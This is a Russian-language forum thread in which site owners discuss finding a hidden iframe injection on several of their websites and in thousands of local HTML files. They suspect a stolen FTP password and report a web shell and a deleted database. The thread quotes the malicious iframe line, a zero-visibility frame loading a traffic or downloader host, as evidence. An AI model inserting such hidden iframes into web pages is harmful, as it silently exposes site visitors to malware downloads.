вот какая проблема возникла, может кто что посоветует. Или сталкивался с таким?

Недавно обнаружил на одном из своих сайтов в коде примерно такую хрень:


кароче даунлоадер...

самое прикольное что потом такое же примерно появилось еще на паре сайтов. Если в первом случае я грешил на админа ихнего, то во втором случае кроме меня никто доступ туда не имеет...
техподдержка хостинга ответила что типа у меня сперли фтп пароль...

Вот теперь думаю, почему только 3 сайта из 30 заражены?
И у меня ли сперли или хостинг ломанули? причем 2 сразу...
а если сперли то как? Антивирус стоит, Avast, (переставил на NOD32) никогда не орал вроде, ну тока на почту, и ту удалял сразу...

И че делать? все пароли менять?

Хм. Лёх странно, он даже не пингуется

traffloads.com - ничего так сайт...
почему даунловадер?
блин. ничерта не ясно. по ссылкешлёт на другой сайт, который ссылается на третий... кто-то раскручивается?
чёрный сео?

fidukoff писал(а):

вот какая проблема возникла, может кто что посоветует. Или сталкивался с таким? Недавно обнаружил на одном из своих сайтов в коде примерно такую хрень: Код: <IFRAME src="http://traffloads.com/out.php?s_id=2" width=5 height=5 style="display:none"></IFRAME>

Недавно при проверке NODом обнаружил такую же хрень (только адрес сайта другой) во всех сохраненных из инета страницах на отцовском компьютере. Кроме того, заражены файлы справки и подобное... В общем, все html файлы.
Итого 12000 (двенадцать тысяч) зараженных файлов.

круто... не, на компе ПОЧТИ чисто... NOD32 отковырял пару троянов, два из которых были хммм... кряками...

может и СЕО... вопрос насколько интересно это серьезно... и как оценить масштаб разрушений

да, на одном из сайтов грохнули тестовую базу... причем использвался веб shell? щас не помню как кличется. был закачен файлик, а дальше руление всем серваком через вебинтерфейс. Но файлик явно был закачен по фтп... по спертому паролю..
блин засада.

http://traffloads.com/webalizer/usage_200701.html - там много удивительных хитов. Лидер - http://apelsinoff.net/